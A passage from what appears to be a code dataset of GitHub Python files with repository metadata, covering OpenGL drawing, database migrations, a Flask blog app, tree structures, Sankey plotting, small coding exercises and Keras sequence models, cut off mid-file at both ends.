up_pnts=[[0.0, 0.0, h], [l, 0.0, h], [l, w, h], [0.0, w, h]]\n for i in range(11):\n angle=pi*float(i)/10.0\n #print cos(angle)\n c = cos(angle)*h_l\n s = sin(angle)*h_l\n arc_pnts_b.append([c+h_l, 0, s])\n arc_pnts_f.append([c+h_l, w, s])\n glNewList(self.id, GL_COMPILE)\n glTranslatef(-l/2.0, -w/2.0, -h/2.0) \n #draw 4 lines\n glBegin(GL_LINES)\n for i in range(4):\n glVertex3f(low_pnts[i][0], low_pnts[i][1], low_pnts[i][2])\n glVertex3f(up_pnts[i][0], up_pnts[i][1], up_pnts[i][2])\n glEnd()\n #####################################\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], -arc_pnts_b[i][2])\n glEnd()\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], -arc_pnts_f[i][2])\n glEnd()\n glBegin(GL_LINES)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], -arc_pnts_b[i][2])\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], -arc_pnts_f[i][2])\n glEnd()\n ########################################\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], h+arc_pnts_b[i][2])\n glEnd()\n glBegin(GL_LINE_STRIP)\n for i in range(11):\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], h+arc_pnts_f[i][2])\n glEnd()\n glBegin(GL_LINES)\n for i in range(11):\n glVertex3f(arc_pnts_b[i][0], arc_pnts_b[i][1], h+arc_pnts_b[i][2])\n glVertex3f(arc_pnts_f[i][0], arc_pnts_f[i][1], h+arc_pnts_f[i][2])\n glEnd()\n glEndList()\n\n def save(self, n, temp):\n att=[]\n att = toxml_block(n+1, \"type\", [self.name()], att)\n att = toxml_block(n+1, \"dims\", [str(self.l)+' '+str(self.w)+' '+str(self.h)], att)\n temp = toxml_block(n, \"shape\", att, temp)\n return temp\n","repo_name":"utbeaver/obdyn_old","sub_path":"src/gui/od_geom.py","file_name":"od_geom.py","file_ext":"py","file_size_in_byte":5334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27689500518","text":"\"\"\"added archived\n\nRevision ID: 12dc43217690\nRevises: 16901867d1f2\nCreate Date: 2019-12-01 19:33:21.556938\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '12dc43217690'\ndown_revision = '16901867d1f2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('event', sa.Column('archived', sa.String(length=10), nullable=True))\n op.create_index(op.f('ix_event_archived'), 'event', ['archived'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_event_archived'), table_name='event')\n op.drop_column('event', 'archived')\n # ### end Alembic commands ###\n","repo_name":"Angelozinna96/CC_project","sub_path":"migrations/versions/12dc43217690_added_archived.py","file_name":"12dc43217690_added_archived.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15558746453","text":"import random\nimport numpy as np\n\ndef gen_matix():\n rows = int(input())\n cols = int(input())\n matr = list()\n\n print(f\"{rows} {cols}\")\n\n for _ in range(cols):\n row = list()\n for _ in range(rows):\n num = random.randint(1,5)\n print(num, end=\" \")\n row.append(num)\n matr.append(row)\n #\n print()\n #\n return matr\n\ndef dump(matr):\n shape = matr.shape\n print(f\"{shape[0]} {shape[1]}\")\n for row_it in range(shape[0]):\n for col_it in range(shape[1]):\n print(matr[row_it][col_it], end=\" \")\n #\n print()\n\ndef main():\n matr1 = gen_matix()\n print()\n matr2 = gen_matix()\n \n matr1 = np.array(matr1)\n matr2 = np.array(matr2)\n\n res = np.dot(matr1, matr2)\n\n print()\n dump(res)\n\nif __name__ == '__main__':\n main()","repo_name":"uslsteen/parallel_prog","sub_path":"include/matrix/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19646002331","text":"##############################################################################\n#\n# This file is part of JA2 Open Toolset\n#\n# JA2 Open Toolset is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Lesser General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# JA2 Open Toolset is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public License\n# along with JA2 Open Toolset. If not, see .\n#\n##############################################################################\n\nimport io\nimport struct\n\nALPHA_VALUE = 0\nIS_COMPRESSED_BYTE_MASK = 0x80\nNUMBER_OF_BYTES_MASK = 0x7F\n\n\nclass EtrleException(Exception):\n \"\"\"Raised when an error in compression or decompression occurs\"\"\"\n pass\n\n\ndef etrle_decompress(data):\n number_of_compressed_bytes = len(data)\n compressed_bytes = struct.unpack('<{}B'.format(number_of_compressed_bytes), data)\n extracted_buffer = io.BytesIO()\n bytes_til_next_control_byte = 0\n\n for current_byte in compressed_bytes:\n if bytes_til_next_control_byte == 0:\n is_compressed_alpha_byte = ((current_byte & IS_COMPRESSED_BYTE_MASK) >> 7) == 1\n length_of_subsequence = current_byte & NUMBER_OF_BYTES_MASK\n if is_compressed_alpha_byte:\n for s in range(length_of_subsequence):\n extracted_buffer.write(struct.pack(' 6 colors\n colorPalette = ['#4B8BBE', '#306998', '#FFE873', '#FFD43B', '#646464', '#F69824', '#CC2336']\n #colorPalette = ['#26235B', '#812878', '#A22160', '#CC2336', '#E4682A', '#F69824']\n\n labelList = []\n colorNumList = []\n for catCol in cat_cols:\n cat_value = flatten(df[catCol].values)\n labelListTemp = list(cat_value)\n colorNumList.append(len(labelListTemp))\n labelList = labelList + labelListTemp\n\n # remove duplicates from labelList\n labelList = list(dict.fromkeys(labelList))\n\n\n # define colors based on number of levels\n print('colorNumList:', colorNumList)\n colorList = []\n for idx, colorNum in enumerate(colorNumList):\n colorList = colorList + [colorPalette[idx]] * colorNum\n\n\n # transform df into a source-target pair\n for i in range(len(cat_cols) - 1):\n cat_str1 = ''.join(cat_cols[i])\n cat_str2 = ''.join(cat_cols[i + 1])\n\n if i == 0:\n sourceTargetDf = df[[cat_str1, cat_str2, value_cols]]\n #print(\"here:\",flatten(df[cat_str1]))\n sourceTargetDf.columns = ['source', 'target', 'count']\n else:\n tempDf = df[[cat_str1, cat_str2, value_cols]]\n tempDf.columns = ['source', 'target', 'count']\n sourceTargetDf = pd.concat([sourceTargetDf, tempDf])\n sourceTargetDf = sourceTargetDf.groupby(['source', 'target']).agg({'count': 'sum'}).reset_index()\n sourceTargetDf['target'].replace('', np.nan, inplace=True)\n sourceTargetDf = sourceTargetDf.dropna(axis=0, inplace=False)\n\n #print('sourceTargetDf gouped:', sourceTargetDf)\n\n #time.sleep(5)\n # add index for source-target pair\n sourceTargetDf['sourceID'] = sourceTargetDf['source'].apply(lambda x: labelList.index(x))\n sourceTargetDf['targetID'] = sourceTargetDf['target'].apply(lambda x: labelList.index(x))\n\n # creating the sankey diagram\n data = dict(\n type='sankey',\n node=dict(\n pad=15,\n thickness=20,\n line=dict(\n color=\"black\",\n width=0.5\n ),\n label=labelList,\n color=colorList\n ),\n link=dict(\n source=sourceTargetDf['sourceID'],\n target=sourceTargetDf['targetID'],\n value=sourceTargetDf['count']\n )\n )\n\n layout = dict(\n title=title,\n font=dict(\n size=10\n )\n )\n\n fig = dict(data=[data], layout=layout)\n return fig\n\ncon = tdsql.connect(host=\"192.168.100.162\", user=\"td01\", password=\"td01\")\ncus = con.cursor()\n\ndef sql_icld_cols(sql):\n cus.execute(sql)\n rst_no_cols = cus.fetchall()\n cols_des = cus.description\n\n col = [] # 创建一个空列表以存放列名\n for v in cols_des:\n col.append(v[0]) # 循环提取列名,并添加到col空列表\n dfsql = pd.DataFrame(rst_no_cols, columns=col) # 将查询结果转换成DF结构,并给列重新赋值\n if dfsql.empty:\n return 'empty set'\n else:\n return dfsql\n\n# Sankey 1 for all users\nrst = sql_icld_cols(\"select 数据区类型, 数据区名称,ORG_NM,SUB_ORG_0,SUB_ORG_1,SUB_ORG_2,SUB_ORG_3,CountQuery \\\n from cmb_datalab_20200409_sankey;\")\n\nfig = genSankey(rst, cat_cols=[['数据区类型'],['数据区名称'],['ORG_NM'], ['SUB_ORG_0'], ['SUB_ORG_1'], ['SUB_ORG_2'], ['SUB_ORG_3']],\n value_cols='CountQuery', title='Sankey Diagram-CMB_EDW全行用户查询量分布图(数据时间:2020.04.09)')\nplotly.offline.plot(fig, filename='overview.html', validate=False)\n\n# Sankey 2 for IT users\nrst = sql_icld_cols(\"select 数据区类型, 数据区名称,ORG_NM,SUB_ORG_0,SUB_ORG_1,SUB_ORG_2,SUB_ORG_3,CountQuery \\\n from cmb_datalab_20200409_sankey where ORG_NM = '信息技术部';\")\n\nfig = genSankey(rst, cat_cols=[['数据区类型'],['数据区名称'], ['SUB_ORG_1'], ['SUB_ORG_2'], ['SUB_ORG_3']],\n value_cols='CountQuery', title='Sankey Diagram-CMB_EDW信息技术部用户查询量分布图(数据时间:2020.04.09)')\nplotly.offline.plot(fig, filename='it_dep.html', validate=False)\n\n# Sankey 3 for Business users\nrst = sql_icld_cols(\"select 数据区类型, 数据区名称,ORG_NM,SUB_ORG_0,SUB_ORG_1,SUB_ORG_2,SUB_ORG_3,CountQuery \\\n from cmb_datalab_20200409_sankey where ORG_NM <> '信息技术部';\")\n\nfig = genSankey(rst, cat_cols=[['数据区类型'],['数据区名称'],['ORG_NM'], ['SUB_ORG_0'], ['SUB_ORG_1'], ['SUB_ORG_2'],\n ['SUB_ORG_3']], value_cols='CountQuery',\n title='Sankey Diagram-CMB_EDW全行业务用户查询量分布图(数据时间:2020.04.09)')\nplotly.offline.plot(fig, filename='b_dep.html', validate=False)\n","repo_name":"LZatTD/sankey","sub_path":"cmb_datalab_sankey.py","file_name":"cmb_datalab_sankey.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11962453047","text":"import sys\n\nsys.stdin = open('input.txt')\n\nN = int(input())\n\ndef push_back(b, num):\n b.append(num)\n\ndef push_front(b, num):\n b.insert(0,num)\n\ndef pop_back(b):\n if len(b) == 0:\n return -1\n else:\n c = b.pop()\n return c\n\ndef pop_front(b):\n if len(b) == 0:\n return -1\n else:\n c = b.pop(0)\n return c\n\n\ndef size(b):\n return len(b)\n\ndef empty(b):\n if len(b) == 0:\n return 1\n else:\n return 0\n\ndef front(b):\n if len(b) == 0:\n return -1\n else:\n return b[0]\n\ndef back(b):\n if len(b) == 0:\n return -1\n else:\n return b[-1]\n\n\na = []\nfor _ in range(N):\n temp = list(map(str, sys.stdin.readline().split()))\n if len(temp) == 2:\n order, M = temp[0], temp[1]\n M = int(M)\n else:\n order = temp[0]\n\n\n if order == 'push_front':\n push_front(a, M)\n elif order == 'push_back':\n push_back(a, M)\n elif order == 'pop_front':\n print(pop_front(a))\n elif order == 'pop_back':\n print(pop_back(a))\n elif order == 'size':\n print(size(a))\n elif order == 'empty':\n print(empty(a))\n elif order == 'front':\n print(front(a))\n else:\n print(back(a))","repo_name":"sw200662/Algorithm_my","sub_path":"2112/1208/10866.py","file_name":"10866.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13683846048","text":"print(\" Welcome! You can create your own chess board with me!\")\r\n\r\nrow=int(input(\"Enter the number of rows: \"))\r\ncolumn=int(input(\"Enter the number of columns: \"))\r\n\r\ndef Chess_board(column,row):\r\n \r\n for i in range(row):\r\n for j in range(column):\r\n if (i+j)%2==0 :\r\n print(\"#\",end=\"\")\r\n else:\r\n print(\"*\",end=\"\")\r\n print()\r\n\r\nChess_board(row,column)\r\n","repo_name":"ElahahAria/Session5","sub_path":"seesion5-chess.py","file_name":"seesion5-chess.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74252598913","text":"\nimport os\nimport subprocess\nimport time\n\nimport pytest\nimport requests\n\n\nTIMEOUT = 120\n\n\n@pytest.fixture\ndef env():\n def wait_for_env():\n start = time.time()\n while True:\n try:\n requests.get('http://localhost:8080/ping')\n requests.get('http://localhost:8080/api/ping')\n time.sleep(0.5)\n except requests.exceptions.ConnectionError:\n if time.time() - start >= TIMEOUT:\n raise ValueError('failed to create env')\n continue\n return\n\n root = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..')\n subprocess.Popen([os.path.join(root, 'up.sh')])\n wait_for_env()\n yield\n p = subprocess.Popen([os.path.join(root, 'down.sh')])\n p.wait()\n","repo_name":"leongold/dep-view","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2329953160","text":"import re\n\nfrom coverage.html import escape\nfrom django.http import HttpResponse\nfrom jinja2 import Environment, PackageLoader\nfrom xml.sax.saxutils import escape\nimport unicodedata\n\nfrom mangrove.form_model.field import field_attributes, SelectField, UniqueIdField, UniqueIdUIField\nfrom mangrove.form_model.form_model import FormModel\nfrom mangrove.form_model.project import Project\n\nenv = Environment(loader=PackageLoader('mangrove.transport.xforms'), trim_blocks=True)\ndate_appearance = {\n 'mm.yyyy': 'month-year',\n 'yyyy': 'year'\n}\n\nfield_xmls = {\n field_attributes.DATE_FIELD: env.get_template(name='date_field.xml', globals={'date_appearance': date_appearance}),\n field_attributes.SELECT_FIELD: env.get_template('select_field.xml'),\n field_attributes.MULTISELECT_FIELD: env.get_template('select_field.xml'),\n field_attributes.LOCATION_FIELD: env.get_template('geo_code_field.xml'),\n field_attributes.UNIQUE_ID_FIELD: env.get_template('unique_id_field.xml'),\n}\n\nfield_types = {\n field_attributes.LOCATION_FIELD: 'geopoint',\n field_attributes.TEXT_FIELD: 'string',\n field_attributes.INTEGER_FIELD: 'decimal',\n field_attributes.UNIQUE_ID_FIELD: 'select1',\n field_attributes.SELECT_ONE_EXTERNAL_FIELD: 'string'\n}\n\n\ndef list_all_forms(form_tuples, xform_base_url):\n template = env.get_template('form_list.xml')\n form_tuples = [(escape(form_name), form_id, has_external_itemset) for form_name, form_id, has_external_itemset in form_tuples]\n return template.render(form_tuples=form_tuples, xform_base_url=xform_base_url)\n\n\ndef xform_for(dbm, form_id, reporter_id):\n questionnaire = FormModel.get(dbm, form_id)\n\n xform = questionnaire.xform\n if xform:\n xform_cleaned = re.sub(r\"\\s+\", \" \", re.sub(r\"\\n\", \"\", questionnaire.xform_with_unique_ids_substituted()))\n questionnaire.name = escape(questionnaire.name)\n #so that in the smartphone repeat questions have atleast one group pre added\n xform_cleaned = re.sub(r\".*\", r\"\"+ questionnaire.name +\"\", xform_cleaned)\n xform_cleaned = re.sub(r\"\", r\"\"+ questionnaire.name +\"\", xform_cleaned)\n return re.sub('ns2:template=\"\"', \"\", xform_cleaned)\n\n _escape_special_characters(questionnaire)\n ui_fields = []\n for field in questionnaire.fields:\n if isinstance(field, UniqueIdField):\n ui_fields.append(UniqueIdUIField(field,dbm))\n else:\n ui_fields.append(field)\n template = env.get_template('reporter_entity_form.xml')\n return template.render(questionnaire=questionnaire, fields=ui_fields, field_xmls=field_xmls, reporter_id=reporter_id,\n field_types=field_types, default_template=env.get_template('text_field.xml'))\n\n\ndef itemset_for(dbm, form_id):\n questionnaire = FormModel.get(dbm, form_id)\n\n xform = questionnaire.xform\n project = Project.from_form_model(questionnaire)\n if xform:\n try:\n csv, file_extension = project.has_external_itemset()[1:]\n\n response = HttpResponse(mimetype=\"text/csv\", content=csv)\n response['Content-Disposition'] = 'attachment; filename=\"%s.%s\"' % ('itemsets', file_extension)\n\n except LookupError:\n response = HttpResponse(status=404)\n\n return response\n\ndef _escape_special_characters(questionnaire):\n questionnaire.name = escape(questionnaire.name)\n for question in questionnaire.fields:\n question.set_label(escape(question.label))\n question.set_instruction(escape(question.instruction))\n if type(question) == SelectField:\n question.escape_option_text()\n","repo_name":"mangroveorg/mangrove","sub_path":"mangrove/transport/xforms/xform.py","file_name":"xform.py","file_ext":"py","file_size_in_byte":3694,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"29807539205","text":"import argparse\nimport AVL\nimport BST\n\nBSTtestTree = BST.binary_search_tree()\nAVLtestTree = AVL.AVLTree()\n\ndef readFile(fileName):\n countA = 0\n countB = 0\n\n try:\n fileObject = open(fileName, \"r\")\n\n for line in fileObject:\n line = line.lower()\n countA = BSTtestTree.insert(line)\n countB = AVLtestTree.insert(line)\n\n print(\"THIS IS BST\")\n BSTtestTree.height()\n print(\"Total Duplicates: \", BSTtestTree._getDups())\n\n print(\"Total Inserted: \", countA)\n\n print(\"THIS IS AVL\")\n print(\"Height of AVL tree is: \" , AVLtestTree.height())\n print(\"Total Duplicates: \", AVLtestTree._getDups())\n\n print(\"Total Inserted: \", countB)\n\n except IOError:\n print(\"Error opening file\")\n\ndef delVal(fileName2):\n try:\n fileObject = open(fileName2, \"r\")\n\n for line in fileObject:\n line = line.lower()\n AVLtestTree.delete_value(line)\n\n print(\"Deletes: \", AVLtestTree._getDel())\n except IOError:\n print(\"Error opening file\")\n\n# get input\ndef main():\n running = True\n while running:\n try:\n parser = argparse.ArgumentParser()\n parser.add_argument('exp', help = \"Enter expression\")\n parser.add_argument('exp2', help=\"Enter expression\")\n fileName = parser.parse_args()\n fileName2= parser.parse_args()\n except SystemExit:\n print(\"No input found\")\n else:\n readFile(fileName.exp)\n delVal(fileName2.exp2)\n running = False\n\n\n\n\nmain()\n","repo_name":"mheim6/AVL-and-BST","sub_path":"Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71571737475","text":"from flask import Flask, request, render_template, redirect, flash\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import db, connect_db, User, Post, Tag\nfrom helper import query_all, query_by_id\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///blogly'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_ECHO'] = True\n\napp.config['SECRET_KEY'] = 'secret-goes-here'\napp.config['DEBUG_TB_INTERCEPT_REDIRECTS'] = False\ndebug = DebugToolbarExtension(app)\n\nconnect_db(app)\ndb.create_all()\n\n@app.route('/')\ndef users_page_redirect():\n return redirect('/users')\n\n@app.route('/users')\ndef show_users():\n users = query_all(User)\n return render_template('/list.html', users=users)\n\n@app.route('/users/')\ndef show_user_details(user_id):\n user = query_by_id(User, user_id)\n return render_template('/user/details.html', user=user)\n\n@app.route('/users/new')\ndef show_new_user_form():\n return render_template('/user/new.html')\n\n@app.route('/users/new', methods=['POST'])\ndef submit_new_user():\n first_name = request.form['first_name']\n last_name = request.form['last_name']\n image_url = request.form['image_url']\n\n user = User(first_name=first_name, last_name=last_name, image_url=image_url)\n flash('User created!')\n\n db.session.add(user)\n db.session.commit()\n return redirect(f'/users/{user.id}')\n\n@app.route('/users//edit')\ndef edit_user_form(user_id):\n user = query_by_id(User, user_id)\n return render_template('/user/edit.html', user=user)\n\n@app.route('/users//edit', methods=['POST'])\ndef submit_edited_user(user_id):\n user = query_by_id(User, user_id)\n\n user.first_name = request.form['first_name']\n user.last_name = request.form['last_name']\n user.image_url = request.form['image_url']\n\n flash(f'{user.first_name} {user.last_name} updated!')\n db.session.commit()\n\n return redirect('/users')\n\n@app.route('/users//delete', methods=['POST'])\ndef delete_user(user_id):\n user = query_by_id(User, user_id)\n db.session.delete(user)\n db.session.commit()\n\n flash(f'{user.first_name} {user.last_name} deleted')\n \n return redirect('/users')\n\n# posts\n\n@app.route('/posts/')\ndef show_post_details(post_id):\n post = query_by_id(Post, post_id)\n return render_template('/post/details.html', post=post)\n\n@app.route('/users//posts/new')\ndef show_new_post_form(user_id):\n user = query_by_id(User, user_id)\n tags = query_all(Tag)\n\n return render_template('/post/new.html', user=user, tags=tags)\n\n@app.route('/users//posts/new', methods=['POST'])\ndef submit_new_post(user_id):\n user = query_by_id(User, user_id)\n \n title = request.form['title']\n content = request.form['content']\n\n post = Post(title=title, content=content, user=user)\n flash('Post created!')\n\n db.session.add(post)\n db.session.commit()\n\n return redirect(f'/users/{user_id}')\n\n@app.route('/posts//edit')\ndef edit_post_form(post_id):\n post = query_by_id(Post, post_id)\n tags = query_all(Tag)\n return render_template('/post/edit.html', post=post, tags=tags)\n\n@app.route('/posts//edit', methods=['POST'])\ndef submit_edited_post(post_id):\n post = query_by_id(Post, post_id)\n\n post.title = request.form['title']\n post.content = request.form['content']\n \n tag_ids = [int(num) for num in request.form.getlist('tag')]\n post.tags = Tag.query.filter(Tag.id.in_(tag_ids)).all()\n\n flash('Post Updated!')\n\n db.session.commit()\n\n return redirect(f'/users/{post.user_id}')\n\n@app.route('/posts//delete', methods=['POST'])\ndef delete_post(post_id):\n post = query_by_id(Post, post_id)\n \n db.session.delete(post)\n db.session.commit()\n\n flash('Post deleted')\n\n return redirect(f'/users/{post.user_id}')\n\n# Tags \n\n@app.route('/tags')\ndef show_tags():\n all_tags = query_all(Tag)\n return render_template('tag/list.html', tags=all_tags)\n\n@app.route('/tags/')\ndef show_tag_details(tag_id):\n tag = query_by_id(Tag, tag_id)\n return render_template('tag/details.html', tag=tag)\n\n@app.route('/tags/new')\ndef show_new_tag_form():\n return render_template('tag/new.html')\n\n@app.route('/tags/new', methods=['POST'])\ndef submit_new_tag():\n name = request.form['name']\n tag = Tag(name=name)\n\n flash('Tag created!')\n\n db.session.add(tag)\n db.session.commit()\n return redirect('/tags')\n\n@app.route('/tags//edit')\ndef edit_tag_form(tag_id):\n tag = query_by_id(Tag, tag_id)\n return render_template('tag/edit.html', tag=tag)\n\n@app.route('/tags//edit', methods=['POST'])\ndef submit_edited_tag(tag_id):\n tag = query_by_id(Tag, tag_id)\n tag.name = request.form['name']\n\n flash('Tag updated!')\n\n db.session.commit()\n\n return redirect(f'/tags/{tag.id}')\n\n@app.route('/tags//delete', methods=['POST'])\ndef delete_tag(tag_id):\n tag = query_by_id(Tag, tag_id)\n\n db.session.delete(tag)\n db.session.commit()\n\n flash('Tag deleted')\n\n return redirect('/tags')","repo_name":"andidietz/blogly_part_three","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38484021158","text":"from abc import ABC, abstractmethod\nfrom pydraw import resize, clear, circle\n\nclass Drawable(ABC):\n @abstractmethod\n def draw(self, x, y): pass\n\nclass Canvas: \n width = 400\n height = 400\n bgcolor = 'white'\n\n @classmethod\n def initialize(cls, width, height, bgcolor):\n cls.width = width\n cls.height = height\n cls. bgcolor = bgcolor\n resize(cls.width, cls.height)\n clear(cls.bgcolor)\n\n @classmethod\n def draw_object(cls, x, y, obj: Drawable):\n obj.draw(x, y)\n\nclass Circle(Drawable):\n def __init__(self, radius, color):\n self.radius = radius\n self.color = color\n def draw(self, x, y):\n circle(x, y, self.radius, self.color)\n\nclass Smiley(Drawable):\n def __init__(self, size):\n self.size = size\n def draw(self, x, y):\n circle(x, y, self.size / 2, 'yellow', True)\n circle(x - self.size / 4, y, self.size / 10, 'black', True)\n circle(x + self.size / 4, y, self.size / 10, 'black', True)\n\nif __name__ == '__main__':\n Canvas.initialize(400, 400, 'white')\n Canvas.draw_object(0, 0, Circle(100, 'black'))\n Canvas.draw_object(-200, -200, Circle(100, 'black'))\n Canvas.draw_object(100, -100, Circle(100, 'blue'))\n Canvas.draw_object(200, -200, Smiley(100))","repo_name":"abuamar142/semester3","sub_path":"pemrograman_berorientasi_objek/pydraw/canvas.py","file_name":"canvas.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41773568355","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 26 00:27:02 2018\r\n\r\n@author: Wenchang Chen\r\n\"\"\"\r\n\r\ndef subsets(nums):\r\n if len(nums) == 1:\r\n return [[],[nums[0]]]\r\n else:\r\n tmp = nums.pop(0)\r\n res = subsets(nums)\r\n return [[tmp] + x for x in res] + res","repo_name":"chenwenchang/Leetcode","sub_path":"78. Subsets.py","file_name":"78. Subsets.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70204273155","text":"from collections import Counter\nclass Solution:\n def sumOfUnique(self, nums: list[int]) -> int:\n c= Counter(nums)\n ans=0\n for i,val in c.items():\n if val==1:\n ans+=i\n return ans\na= Solution()\na.sumOfUnique([1,2,3,4,5])","repo_name":"z369437558/Leetcode","sub_path":"1748.py","file_name":"1748.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"72640985795","text":"import numpy as np\nimport tensorflow as tf\nfrom keras.models import Model\nfrom keras.optimizers import Adam\nfrom keras.layers import LSTM,RepeatVector,Dense,Activation,Add,Reshape,Input,Lambda,Multiply,Concatenate,Dot,Permute, Softmax,SimpleRNN,AveragePooling1D\nimport keras.backend as K\nlatent_dim = 64\n\ndef RNN(lookback = 6, predstep = 3, input_dim = 1, latent_dim = latent_dim):\n #RNN\n #input shape [batch_size, timestep, input_dim]\n #output shape [batch_size, prestep, output_dim] #output_dim is 1 by default\n rnn_inputs = Input(shape=(None, input_dim),name = 'rnn_input') \n rnn = SimpleRNN(latent_dim, name = 'RNN')\n rnn_r1 = rnn(rnn_inputs)\n rnn_outputs = RepeatVector(1)(rnn_r1)\n rnn_outputs = Dense(1)(rnn_outputs)\n rnn_model = Model(rnn_inputs, rnn_outputs)\n return rnn_model\n\ndef lstm(lookback = 6, predstep = 3, input_dim = 1, latent_dim = latent_dim):\n #LSTM\n #input shape [batch_size, timestep, input_dim]\n #output shape [batch_size, prestep, output_dim] #output_dim is 1 by default\n lstm_inputs = Input(shape=(None, input_dim),name = 'lstm_input') \n lstm = LSTM(latent_dim, name = 'lstm')\n lstm_r1 = lstm(lstm_inputs)\n lstm_outputs = RepeatVector(1)(lstm_r1)\n lstm_outputs = Dense(1)(lstm_outputs)\n lstm_model = Model(lstm_inputs, lstm_outputs)\n return lstm_model\n\ndef seq2seq(lookback = 6, input_dim = 1, latent_dim = latent_dim):\n encoder_inputs = Input(shape = (lookback, input_dim), name = 'encoder_input')\n encoder = LSTM(latent_dim, return_state = True, name = 'encoder_lstm')\n encoder_outputs, state_h, state_c = encoder(encoder_inputs)\n encoder_states = [state_h, state_c]\n \n decoder_inputs = Input(shape = (None, 1), name = 'decoder_input')\n decoder_lstm = LSTM(latent_dim, return_sequences = True, return_state = True, name = 'decoder_lstm')\n decoder_outputs, _, _ = decoder_lstm(decoder_inputs, initial_state = encoder_states)\n\n decoder_dense = Dense(1, name='output_dense')\n decoder_outputs = decoder_dense(decoder_outputs)\n \n #model for training\n model = Model([encoder_inputs, decoder_inputs], decoder_outputs)\n \n #encoder \n #intput: endoer_inputs\n #output: encoder_states\n encoder_model = Model(encoder_inputs, encoder_states)\n \n #decoder for decode sequences\n #input: decoder_input, decoder_states_inputs\n #output: decoder_outputs, states\n decoder_state_input_h = Input(shape = (latent_dim,), name = 'decoder_ini_state_h')\n decoder_state_input_c = Input(shape = (latent_dim,), name = 'decoder_ini_state_c')\n decoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\n\n decoder_outputs, state_h, state_c = decoder_lstm(decoder_inputs, initial_state = decoder_states_inputs)\n decoder_states = [state_h, state_c]\n\n decoder_outputs = decoder_dense(decoder_outputs)\n decoder_model = Model([decoder_inputs] + decoder_states_inputs, [decoder_outputs] + decoder_states)\n \n return model, encoder_model, decoder_model\n\ndef lstm_prediction(test_input, model, pre_step = 1):\n #using lstm model for multi-step prediction\n #test_input: [samples, steps, n]\n #lstm seq\n lstm_i_seq = test_input[0]\n lstm_o_seq = np.zeros((test_input[0].shape[0], pre_step, 1))\n for i in range(pre_step):\n output = model.predict(lstm_i_seq)\n lstm_o_seq[:,i,0] = output[:,0,0]\n #update the target sequence of length 1\n lstm_i_seq[:,0:5,0] = lstm_i_seq[:,1:6,0]\n lstm_i_seq[:,5,0] = output[:,0,0]\n return lstm_o_seq\n \nclass MASTNN(object):\n def __init__(self, T = 6, predT = 1, encoder_latent_dim = 64, decoder_latent_dim = 64, aux_att = True, global_att = True, context_mode = 'att' , neigh_num = 15 , trainmode = False):\n super(MASTNN, self).__init__()\n self.trainmode = trainmode # when trainmode is no, the decoder will use the truth value of prev time step to decode\n self.T = T\n self.predT = predT\n self.encoder_latent_dim = encoder_latent_dim\n self.decoder_latent_dim = decoder_latent_dim\n #lstm for encoder and decoder \n self.enLSTM = LSTM(encoder_latent_dim, return_state = True, name = 'encoder_lstm')\n self.deLSTM = LSTM(decoder_latent_dim, return_state 